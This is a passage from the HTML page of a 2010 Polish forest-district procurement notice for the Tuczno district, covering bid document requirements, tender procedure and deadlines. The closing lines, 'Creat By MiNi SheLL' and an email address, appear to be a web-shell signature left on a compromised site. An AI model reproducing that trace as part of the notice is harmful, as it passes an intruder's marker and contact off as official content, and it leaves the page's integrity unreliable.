8)	Oświadczenie i informacja Wykonawcy o sposobie utylizacji lub przekazania do utylizacji materiałów pochodzących z rozbiórki dla innego podmiotu wraz ze wskazaniem miejsca i sposobu utylizacji lub innego wykorzystania tych materiałów. Jeżeli materiały będą przekazywane na składowisko odpadów komunalnych - do oświadczenia należy załączyć kopię umowy z danym składowiskiem lub zaświadczenie ze składowiska potwierdzające przyjmowanie odpadów.

3. Forma dokumentów i oświadczeń:
1)	dokumenty i oświadczenia dołączone do oferty muszą być w formie oryginałów lub kopii;
2)	dokumenty sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język polski;
3)	kopie dokumentów muszą być potwierdzone za zgodność z oryginałem przez Wykonawcę lub przez osobę posiadającą odpowiednie pełnomocnictwo;
4)	w przypadku Wykonawców wspólnie ubiegających  się o udzielenie zamówienia oraz w przypadku podmiotów, o których mowa w pkt. 1 ppkt. 1.3 i 1.5, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów mogą być poświadczane za zgodność z oryginałem przez Wykonawcę lub te podmioty.

Kserokopie dokumentów muszą być potwierdzone - za zgodność z oryginałem przez Wykonawcę lub przez osobę posiadającą odpowiednie pełnomocnictwo, 
a w przypadku dokumentów lub oświadczeń sporządzonych w językach obcych należy dołączyć tłumaczenie na język polski podpisane przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pila.lasy.gov.pl/tuczno.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Tuczno, ul. Klasztorna 36; 78-640 Tuczno - pokój nr 14 - Patrycja Woroniewicz.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.02.2010 godzina 10:00, miejsce: sekretariat Nadleśnictwa Tuczno, przy ul. Klasztornej 36..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com